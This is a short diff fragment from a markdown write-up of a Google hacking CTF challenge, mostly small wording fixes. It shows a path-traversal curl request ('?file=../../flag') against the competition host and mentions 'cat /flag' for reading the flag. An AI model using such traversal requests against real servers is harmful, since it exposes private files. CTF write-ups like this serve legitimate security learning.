dguerri/random-tech-stuff/H4CK1NG G00GL3 Main challenges write-up/index.md

 **** drwxr-xr-x   1 nobody nogroup 4096 Sep 30 09:00 web-apps
 ```

-Note the 4 asterisks (‘****’).
+Note the 4 asterisks (`****`).
 These are only useful to make sure each line of the output is matched.

 Here is our flag!
-We can retrieve it by either a `cat /flag` or, since we know how it looks like, just by fully leverage the power of our search engine! 🤣
+We can retrieve either with a `cat /flag` or, since we know how it looks like, just by fully leverage the power of our search engine! 🤣

 ```shell
 ❯ curl 'https://aurora-web.h4ck.ctfcompetition.com/?file=../../flag&term=http'